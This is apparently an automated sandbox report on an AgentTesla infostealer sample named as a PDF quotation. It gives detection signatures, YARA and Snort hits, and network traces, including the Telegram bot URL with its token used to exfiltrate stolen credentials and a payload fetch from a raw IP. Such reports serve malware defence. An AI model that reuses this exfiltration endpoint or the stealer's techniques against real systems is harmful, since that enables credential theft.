Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Quotation-pdf______________________________________.exe

Overview

General Information

Sample Name:Quotation-pdf______________________________________.exe
Analysis ID:613130
MD5:1fdfcda080bbf2130036ffd1209cfdc8
SHA1:635cd09d48013f791b56809c9078c318361cbd66
SHA256:c0cffde9e8ebbcf8118a7d94c1c0d2979ad9401a8f71f4ba926d988043787627
Tags:agentteslaexe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: Suspicious Double Extension
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Yara detected AgentTesla
Antivirus detection for URL or domain
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Uses the Telegram API (likely for C&C communication)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Binary contains a suspicious time stamp
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • cleanup
{"C2 url": "https://api.telegram.org/bot5249845718:AAGAU-0wsEoqm32Ml21Y0Irz58kvd5j9Gss/sendMessage"}
{"Exfil Mode": "Telegram", "Chat id": "1513972286", "Chat URL": "https://api.telegram.org/bot5249845718:AAGAU-0wsEoqm32Ml21Y0Irz58kvd5j9Gss/sendDocument"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.277057232.0000000003F14000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000000.00000002.277057232.0000000003F14000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000004.00000002.493572758.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000004.00000002.493572758.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000000.00000002.276657553.0000000003DF1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 18 entries
            SourceRuleDescriptionAuthorStrings
            0.2.Quotation-pdf______________________________________.exe.3ec4ce0.3.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              0.2.Quotation-pdf______________________________________.exe.3ec4ce0.3.raw.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                0.2.Quotation-pdf______________________________________.exe.3ec4ce0.3.raw.unpackMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
                • 0x32c42:$s10: logins
                • 0x326a9:$s11: credential
                • 0x2ebfb:$g1: get_Clipboard
                • 0x2ec09:$g2: get_Keyboard
                • 0x2ec16:$g3: get_Password
                • 0x2fef7:$g4: get_CtrlKeyDown
                • 0x2ff07:$g5: get_ShiftKeyDown
                • 0x2ff18:$g6: get_AltKeyDown
                4.0.Quotation-pdf______________________________________.exe.400000.10.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  4.0.Quotation-pdf______________________________________.exe.400000.10.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    Click to see the 28 entries

                    System Summary

                    barindex
                    Source: Process startedAuthor: Florian Roth (rule), @blu3_team (idea): Data: Command: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe, CommandLine: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe, NewProcessName: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe, OriginalFileName: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe, ParentCommandLine: "C:\Users\user\Desktop\Quotation-pdf______________________________________.exe" , ParentImage: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe, ParentProcessId: 4400, ParentProcessName: Quotation-pdf______________________________________.exe, ProcessCommandLine: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe, ProcessId: 5224, ProcessName: Quotation-pdf______________________________________.exe
                    Source: Process startedAuthor: frack113: Data: Command: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe, CommandLine: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe, NewProcessName: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe, OriginalFileName: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe, ParentCommandLine: "C:\Users\user\Desktop\Quotation-pdf______________________________________.exe" , ParentImage: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe, ParentProcessId: 4400, ParentProcessName: Quotation-pdf______________________________________.exe, ProcessCommandLine: C:\Users\user\Desktop\Quotation-pdf______________________________________.exe, ProcessId: 5224, ProcessName: Quotation-pdf______________________________________.exe
                    Timestamp:04/21/22-14:20:41.377204 04/21/22-14:20:41.377204
                    SID:2848901
                    Source Port:80
                    Destination Port:49760
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:04/21/22-14:20:40.666385 04/21/22-14:20:40.666385
                    SID:2034631
                    Source Port:49760
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: 4.2.Quotation-pdf______________________________________.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "1513972286", "Chat URL": "https://api.telegram.org/bot5249845718:AAGAU-0wsEoqm32Ml21Y0Irz58kvd5j9Gss/sendDocument"}
                    Source: Quotation-pdf______________________________________.exe.5224.4.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5249845718:AAGAU-0wsEoqm32Ml21Y0Irz58kvd5j9Gss/sendMessage"}
                    Source: Quotation-pdf______________________________________.exeVirustotal: Detection: 20%Perma Link
                    Source: Quotation-pdf______________________________________.exeReversingLabs: Detection: 21%
                    Source: http://45.137.22.163/Toscgshw_Yvmodcuo.pngAvira URL Cloud: Label: malware
                    Source: 4.2.Quotation-pdf______________________________________.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                    Source: 4.0.Quotation-pdf______________________________________.exe.400000.8.unpackAvira: Label: TR/Spy.Gen8
                    Source: 4.0.Quotation-pdf______________________________________.exe.400000.10.unpackAvira: Label: TR/Spy.Gen8
                    Source: 4.0.Quotation-pdf______________________________________.exe.400000.12.unpackAvira: Label: TR/Spy.Gen8
                    Source: 4.0.Quotation-pdf______________________________________.exe.400000.4.unpackAvira: Label: TR/Spy.Gen8
                    Source: 4.0.Quotation-pdf______________________________________.exe.400000.6.unpackAvira: Label: TR/Spy.Gen8
                    Source: Quotation-pdf______________________________________.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49761 version: TLS 1.2
                    Source: Quotation-pdf______________________________________.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                    Networking

                    barindex
                    Source: TrafficSnort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.4:49760 -> 45.137.22.163:80
                    Source: TrafficSnort IDS: 2848901 ETPRO TROJAN Observed Reversed EXE String Inbound (This Program...) 45.137.22.163:80 -> 192.168.2.4:49760
                    Source: unknownDNS query: name: api.telegram.org
                    Source: Joe Sandbox ViewASN Name: ROOTLAYERNETNL ROOTLAYERNETNL
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: global trafficHTTP traffic detected: POST /bot5249845718:AAGAU-0wsEoqm32Ml21Y0Irz58kvd5j9Gss/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da23a512591670Host: api.telegram.orgContent-Length: 1018Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /Toscgshw_Yvmodcuo.png HTTP/1.1Host: 45.137.22.163Connection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                    Source: Joe Sandbox ViewIP Address: 45.137.22.163 45.137.22.163
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.163
                    Source: Quotation-pdf______________________________________.exe, 00000004.00000002.496206298.0000000002771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                    Source: Quotation-pdf______________________________________.exe, 00000000.00000002.276366893.0000000002DF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.137.22.163
                    Source: Quotation-pdf______________________________________.exeString found in binary or memory: http://45.137.22.163/Toscgshw_Yvmodcuo.png
                    Source: Quotation-pdf______________________________________.exe, 00000004.00000002.496206298.0000000002771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
                    Source: Quotation-pdf______________________________________.exe, 00000004.00000002.497285521.0000000002AD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                    Source: Quotation-pdf______________________________________.exe, 00000004.00000002.494764319.0000000000B73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: Quotation-pdf______________________________________.exe, 00000000.00000002.278333834.0000000006D52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
                    Source: Quotation-pdf______________________________________.exe, 00000000.00000002.276366893.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, Quotation-pdf______________________________________.exe, 00000004.00000002.497220319.0000000002AC3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: Quotation-pdf______________________________________.exe, 00000000.00000002.278333834.0000000006D52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: Quotation-pdf______________________________________.exe, 00000000.00000002.278333834.0000000006D52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: Quotation-pdf______________________________________.exe, 00000000.00000002.278333834.0000000006D52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: Quotation-pdf______________________________________.exe, 00000000.00000002.278333834.0000000006D52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: Quotation-pdf______________________________________.exe, 00000000.00000002.278333834.0000000006D52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: Quotation-pdf______________________________________.exe, 00000000.00000002.278333834.0000000006D52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: Quotation-pdf______________________________________.exe, 00000000.00000002.278333834.0000000006D52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                    Source: Quotation-pdf______________________________________.exe, 00000000.00000002.278333834.0000000006D52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: Quotation-pdf______________________________________.exe, 00000000.00000002.278333834.0000000006D52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: Quotation-pdf______________________________________.exe, 00000000.00000002.278333834.0000000006D52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: Quotation-pdf______________________________________.exe, 00000000.00000002.278333834.0000000006D52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                    Source: Quotation-pdf______________________________________.exe, 00000000.00000002.278333834.0000000006D52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: Quotation-pdf______________________________________.exe, 00000000.00000002.278333834.0000000006D52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: Quotation-pdf______________________________________.exe, 00000000.00000002.278333834.0000000006D52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: Quotation-pdf______________________________________.exe, 00000000.00000002.278333834.0000000006D52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: Quotation-pdf______________________________________.exe, 00000000.00000002.278333834.0000000006D52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: Quotation-pdf______________________________________.exe, 00000000.00000002.278333834.0000000006D52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: Quotation-pdf______________________________________.exe, 00000000.00000002.278333834.0000000006D52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: Quotation-pdf______________________________________.exe, 00000000.00000002.278333834.0000000006D52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: Quotation-pdf______________________________________.exe, 00000000.00000002.278333834.0000000006D52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: Quotation-pdf______________________________________.exe, 00000000.00000002.278333834.0000000006D52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: Quotation-pdf______________________________________.exe, 00000000.00000002.278333834.0000000006D52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                    Source: Quotation-pdf______________________________________.exe, 00000000.00000002.278333834.0000000006D52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                    Source: Quotation-pdf______________________________________.exe, 00000000.00000002.278333834.0000000006D52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: Quotation-pdf______________________________________.exe, 00000000.00000002.278333834.0000000006D52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: Quotation-pdf______________________________________.exe, 00000004.00000002.497197640.0000000002ABD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x0Ts8Otn2kD3drlhC.net
                    Source: Quotation-pdf______________________________________.exe, 00000004.00000002.496206298.0000000002771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://zBjoDx.com
                    Source: Quotation-pdf______________________________________.exe, 00000004.00000002.496206298.0000000002771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org%
                    Source: Quotation-pdf______________________________________.exe, 00000004.00000002.496206298.0000000002771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org%%startupfolder%
                    Source: Quotation-pdf______________________________________.exe, 00000004.00000002.497220319.0000000002AC3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                    Source: Quotation-pdf______________________________________.exe, 00000000.00000002.277057232.0000000003F14000.00000004.00000800.00020000.00000000.sdmp, Quotation-pdf______________________________________.exe, 00000000.00000002.276657553.0000000003DF1000.00000004.00000800.00020000.00000000.sdmp, Quotation-pdf______________________________________.exe, 00000000.00000002.276792797.0000000003E85000.00000004.00000800.00020000.00000000.sdmp, Quotation-pdf______________________________________.exe, 00000004.00000002.493572758.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Quotation-pdf______________________________________.exe, 00000004.00000000.272600476.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5249845718:AAGAU-0wsEoqm32Ml21Y0Irz58kvd5j9Gss/
                    Source: Quotation-pdf______________________________________.exe, 00000004.00000002.497220319.0000000002AC3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5249845718:AAGAU-0wsEoqm32Ml21Y0Irz58kvd5j9Gss/sendDocument
                    Source: Quotation-pdf______________________________________.exe, 00000004.00000002.496206298.0000000002771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5249845718:AAGAU-0wsEoqm32Ml21Y0Irz58kvd5j9Gss/sendDocumentdocument-----
                    Source: Quotation-pdf______________________________________.exe, 00000004.00000002.497220319.0000000002AC3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org4Tk
                    Source: Quotation-pdf______________________________________.exe, 00000000.00000002.276562133.0000000002ED9000.00000004.00000800.00020000.00000000.sdmp, Quotation-pdf______________________________________.exe, 00000000.00000002.276394948.0000000002E26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                    Source: Quotation-pdf______________________________________.exe, 00000000.00000002.276562133.0000000002ED9000.00000004.00000800.00020000.00000000.sdmp, Quotation-pdf______________________________________.exe, 00000000.00000002.276394948.0000000002E26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                    Source: Quotation-pdf______________________________________.exe, 00000000.00000002.276562133.0000000002ED9000.00000004.00000800.00020000.00000000.sdmp, Quotation-pdf______________________________________.exe, 00000000.00000002.276394948.0000000002E26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354rCannot
                    Source: Quotation-pdf______________________________________.exe, 00000004.00000002.496206298.0000000002771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
                    Source: unknownHTTP traffic detected: POST /bot5249845718:AAGAU-0wsEoqm32Ml21Y0Irz58kvd5j9Gss/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da23a512591670Host: api.telegram.orgContent-Length: 1018Expect: 100-continueConnection: Keep-Alive
                    Source: unknownDNS traffic detected: queries for: api.telegram.org
                    Source: global trafficHTTP traffic detected: GET /Toscgshw_Yvmodcuo.png HTTP/1.1Host: 45.137.22.163Connection: Keep-Alive
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49761 version: TLS 1.2
                    Source: Quotation-pdf______________________________________.exe, 00000000.00000002.275327401.0000000000FEB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                    System Summary

                    barindex
                    Source: 0.2.Quotation-pdf______________________________________.exe.3ec4ce0.3.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 4.0.Quotation-pdf______________________________________.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.Quotation-pdf______________________________________.exe.3e9ccc0.2.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 4.0.Quotation-pdf______________________________________.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 4.2.Quotation-pdf______________________________________.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.Quotation-pdf______________________________________.exe.3f14d00.4.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 4.0.Quotation-pdf______________________________________.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.Quotation-pdf______________________________________.exe.3ec4ce0.3.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 4.0.Quotation-pdf______________________________________.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.Quotation-pdf______________________________________.exe.3f14d00.4.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 4.0.Quotation-pdf______________________________________.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: initial sampleStatic PE information: Filename: Quotation-pdf______________________________________.exe
                    Source: initial sampleStatic PE information: Filename: Quotation-pdf______________________________________.exe
                    Source: 4.2.Quotation-pdf______________________________________.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b67FC7D7Fu002d2BE6u002d4499u002dA15Cu002d1A380DAE401Au007d/u0033128C0EAu002d0BB5u002d4CBFu002dB6E1u002d2EA9BE17F5D1.csLarge array initialization: .cctor: array initializer size 11689
                    Source: 4.0.Quotation-pdf______________________________________.exe.400000.8.unpack, u003cPrivateImplementationDetailsu003eu007b67FC7D7Fu002d2BE6u002d4499u002dA15Cu002d1A380DAE401Au007d/u0033128C0EAu002d0BB5u002d4CBFu002dB6E1u002d2EA9BE17F5D1.csLarge array initialization: .cctor: array initializer size 11689
                    Source: 4.0.Quotation-pdf______________________________________.exe.400000.10.unpack, u003cPrivateImplementationDetailsu003eu007b67FC7D7Fu002d2BE6u002d4499u002dA15Cu002d1A380DAE401Au007d/u0033128C0EAu002d0BB5u002d4CBFu002dB6E1u002d2EA9BE17F5D1.csLarge array initialization: .cctor: array initializer size 11689
                    Source: 4.0.Quotation-pdf______________________________________.exe.400000.12.unpack, u003cPrivateImplementationDetailsu003eu007b67FC7D7Fu002d2BE6u002d4499u002dA15Cu002d1A380DAE401Au007d/u0033128C0EAu002d0BB5u002d4CBFu002dB6E1u002d2EA9BE17F5D1.csLarge array initialization: .cctor: array initializer size 11689
                    Source: 4.0.Quotation-pdf______________________________________.exe.400000.4.unpack, u003cPrivateImplementationDetailsu003eu007b67FC7D7Fu002d2BE6u002d4499u002dA15Cu002d1A380DAE401Au007d/u0033128C0EAu002d0BB5u002d4CBFu002dB6E1u002d2EA9BE17F5D1.csLarge array initialization: .cctor: array initializer size 11689
                    Source: 4.0.Quotation-pdf______________________________________.exe.400000.6.unpack, u003cPrivateImplementationDetailsu003eu007b67FC7D7Fu002d2BE6u002d4499u002dA15Cu002d1A380DAE401Au007d/u0033128C0EAu002d0BB5u002d4CBFu002dB6E1u002d2EA9BE17F5D1.csLarge array initialization: .cctor: array initializer size 11689
                    Source: Quotation-pdf______________________________________.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                    Source: 0.2.Quotation-pdf______________________________________.exe.3ec4ce0.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 4.0.Quotation-pdf______________________________________.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.Quotation-pdf______________________________________.exe.3e9ccc0.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 4.0.Quotation-pdf______________________________________.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 4.2.Quotation-pdf______________________________________.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.Quotation-pdf______________________________________.exe.3f14d00.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 4.0.Quotation-pdf______________________________________.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.Quotation-pdf______________________________________.exe.3ec4ce0.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 4.0.Quotation-pdf______________________________________.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.Quotation-pdf______________________________________.exe.3f14d00.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 4.0.Quotation-pdf______________________________________.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeCode function: 0_2_07F9F9380_2_07F9F938
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeCode function: 0_2_07FBED300_2_07FBED30
                    Source: C:\Users\user\Desktop\Quotation-pdf______________________________________.exeCode function: 0_2_07FDAC810_2_07FDAC81
